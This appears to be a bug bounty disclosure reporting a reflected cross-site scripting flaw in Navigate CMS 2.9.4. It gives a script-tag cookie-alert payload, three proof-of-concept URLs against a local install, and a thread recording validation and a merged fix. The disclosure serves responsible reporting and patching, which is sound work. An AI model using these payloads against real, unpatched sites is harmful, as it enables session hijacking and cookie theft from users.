Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms

Valid

Reported on

Jan 30th 2022


Description

Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim.

Proof of Concept

Parameter: id

Payload: <script>alert(document.cookie)</script>

Affected endpoints:

On Firefox browser, visit:

1 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E

2 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

3 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E

_

XSS alert will pop-up showing user cookie or xss-1.

Impact

This vulnerability is capable of capture the cookies of anyone that navigates to the vulnerable URL.

Occurrences

References

We are processing your report and will contact the navigatecms/navigate-cms team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Faisal Fs
4 months ago

Researcher


@admin, it has been fixed.

https://github.com/NavigateCMS/Navigate-CMS/commit/f9af8cbf4831599c9092a22f9f931cf1db8c3876

Jamie Slome validated this vulnerability 4 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on f9af8c 4 months ago
The fix bounty has been dropped
files.php#L298 has been validated
to join this conversation